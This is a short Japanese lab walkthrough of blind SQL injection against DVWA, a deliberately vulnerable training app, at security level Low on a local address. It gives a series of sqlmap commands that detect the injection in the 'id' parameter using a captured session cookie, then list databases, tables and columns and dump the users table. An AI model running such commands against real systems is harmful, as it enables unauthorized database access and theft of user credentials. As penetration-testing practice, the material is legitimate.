Hello there,

 

セキュリティレベルを『Low』へ。

まずは、IDを入力して実行して。

URLを確認して。

 

 

DVWAを起動しているIPアドレスを確認して。

 

 

Burp Suiteで、クッキーの情報を取得して。

 

 

『id』についてSQLの処理で脆弱性がないかを調べたいので。

下記のように実行してみて。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id

 

 

なんだか、真偽ベースのブラインドと。

時間ベースのブラインドの脆弱性が検出されたようで。

ペイロードまで表示されていた。

 

下記のようにオプションを追加することで。

アクセス可能なデータベースを確認できて。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id --dbs

 

 

特定のデーターベースについてテーブルを調べたいのであれば。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id -D dvwa --tables

 

 

特定のテーブルについてカラムを調べたいのであれば。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id -D dvwa -T users --columns

 

 

特定のテーブルについてデータをダンプしたいのであれば。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id -D dvwa -T users --dump

 

Best regards,